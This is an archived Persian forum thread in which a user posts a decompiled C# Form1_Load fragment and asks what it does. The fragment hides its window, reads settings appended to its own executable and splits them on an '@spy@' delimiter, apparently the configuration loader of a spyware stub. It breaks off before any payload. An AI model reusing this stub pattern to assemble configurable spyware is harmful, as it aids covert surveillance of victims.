PDA

View Full Version : سوال: از این کدها چی به دست میاد؟؟؟



c-sharp_South
شنبه 01 تیر 1392, 09:44 صبح
سلام دوستان.
یک سوال داشتم. خواستم بدونم از این کد ها چی به دست میاد و کارشون چیه؟


[MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)]
private void Form1_Load(object sender, EventArgs e)
{
this.Hide();
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
this.text1 = Strings.Space((int) FileSystem.LOF(1));
this.text2 = Strings.Space((int) FileSystem.LOF(1));
this.text3 = Strings.Space((int) FileSystem.LOF(1));
this.numberval = Strings.Space((int) FileSystem.LOF(1));
this.cb1 = Strings.Space((int) FileSystem.LOF(1));
this.cb2 = Strings.Space((int) FileSystem.LOF(1));
this.cb3 = Strings.Space((int) FileSystem.LOF(1));
this.cb4 = Strings.Space((int) FileSystem.LOF(1));
FileSystem.FileGet(1, ref this.text1, -1L, false);
FileSystem.FileGet(1, ref this.text2, -1L, false);
FileSystem.FileGet(1, ref this.text3, -1L, false);
FileSystem.FileGet(1, ref this.numberval, -1L, false);
FileSystem.FileGet(1, ref this.cb1, -1L, false);
FileSystem.FileGet(1, ref this.cb2, -1L, false);
FileSystem.FileGet(1, ref this.cb3, -1L, false);
FileSystem.FileGet(1, ref this.cb4, -1L, false);
FileSystem.FileClose(new int[] { 1 });
this.options = Strings.Split(this.text1, "@spy@", -1, CompareMethod.Binary);
this.TextBox2.Text = this.options[1];
this.TextBox3.Text = this.options[2];
this.TextBox4.Text = this.options[3];
this.Label1.Text = this.options[4];
if (!Conversions.ToBoolean(this.options[5]))


میخوام بدونم آخرش مقدار تکست textbox2 و textbox3 چی میشه؟؟؟
اگه کدها کامل نیست و نشد جواب بدین بگید کاملش رو بزارم.
ممنون میشم جواب بدید. واسم خیلی مهمه.
یا حق

c-sharp_South
شنبه 01 تیر 1392, 14:24 عصر
کسی نیست جواب بده؟ :متفکر: